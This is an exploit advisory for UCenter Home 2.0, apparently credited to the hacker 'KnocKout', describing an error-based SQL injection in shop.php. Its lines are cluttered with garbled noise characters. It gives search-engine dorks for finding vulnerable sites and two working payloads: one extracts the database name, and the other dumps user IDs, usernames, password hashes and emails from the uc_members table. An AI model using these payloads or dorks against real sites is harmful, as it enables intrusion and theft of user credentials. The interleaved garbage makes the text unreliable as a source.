9 X. N, \4 g# U7 a# G* Y+ W/ k0 `
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ! n, U) `- b6 i1 b2 T
. k9 V( }9 H7 W 3 g* n% x4 e9 k: {5 r6 i- ?+ h
- T- p3 _' N8 Q*/ Author : KnocKout 8 B2 r: \: Z. X; x
0 |: n# }) R- I/ h5 C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
4 Y" Q( W1 P" ~% l3 p3 ~3 Y$ E, w2 Z6 o# Z( x! \5 ]
*/ Contact: knockoutr@msn.com ( b2 u" Y7 `. h& K
! p: h7 [1 a2 W4 s$ h5 T*/ Cyber-Warrior.org/CWKnocKout
. e+ U Z* I+ Y( b g5 `
& _$ ~" k3 ^9 x" v2 R: Z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ u6 E! a8 R7 _ l7 X
: D t' q4 h7 e! [& U. OScript : UCenter Home
. t0 d) n Q8 n6 A! E7 t6 Z
$ T* ]' b& R5 Y' x" EVersion : 2.0
8 ~3 @& A+ }3 o: T" D4 t8 V: C% u9 x; G, Z% _3 v8 T/ p: A
Script HomePage : http://u.discuz.net/
/ o# ?2 W! r8 D* Y" J7 ?
" a' S C3 Q* M9 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' f/ f$ W7 X8 `& s4 u
$ L0 P2 ^ }3 xDork : Powered by UCenter inurl:shop.php?ac=view
: f/ [4 j, J8 P2 H: D8 q- L9 h, \* a6 C0 v3 t t- ~
Dork 2 : inurl:shop.php?ac=view&shopid=
( L( r/ k; Q3 P9 K. R ]* F
6 `, l) C0 h' v* N/ g__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 8 H( J9 b6 U4 v, ~% D j) A
# M0 g( Y) W8 q$ R8 ^/ d
Vuln file : Shop.php
% \- O/ L" ]5 C5 b! Y' K) {% F5 u
value's : (?)ac=view&shopid= . ?% _7 g s9 i) B9 Y
1 c) x4 f& v3 Y3 b2 m1 SVulnerable Style : SQL Injection (MySQL Error Based) . a+ l; l8 H7 e5 q
$ X5 t- A- Z/ F4 j3 `' @) n J7 H
Need Metarials : Hex Conversion
m; {+ c) B/ z( \; F2 l; |( ?- }- i, t& t+ ?# S
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 T3 r7 @. k& q7 S7 @. r
7 b9 K3 ]% e w8 I2 I" a2 ^( ?
Your Need victim Database name.
7 L9 K! r4 T4 u f& T% Z8 ^& D6 Q/ z. V( r2 E+ u
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
8 R1 j% H U+ m3 S; L9 G' h7 @3 ]9 }+ q7 L; ?! ~7 q6 r
..
O) n& V0 E4 `9 r: Z, C7 f$ C' F2 O0 u! b- S/ f/ r( b$ E
DB : Okey.
! f) a6 C6 K+ o# Z+ O
# K0 l" V( j+ P) d s% ]; zyour edit DB `[TARGET DB NAME]` + u# t/ \7 _; p: t
( y8 `, a; R/ b; a3 k
Example : 'hiwir1_ucenter'
8 E- X' \- `# b: L6 B, Z, @+ u; N: {) k( H4 T* e1 V
Edit : Okey.
5 h- Y- ^# x8 P9 H: `! w# p7 Q; G
Your use Hex conversion. And edit Your SQL Injection Exploit..
2 Z/ j( A. V+ o F- A8 K
* v* M0 H) B, J1 n ; M @! _ C8 ^# [6 v
. Y. A, |4 B/ L( Y$ a M) U
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
# ^- x1 u; B2 t* Z |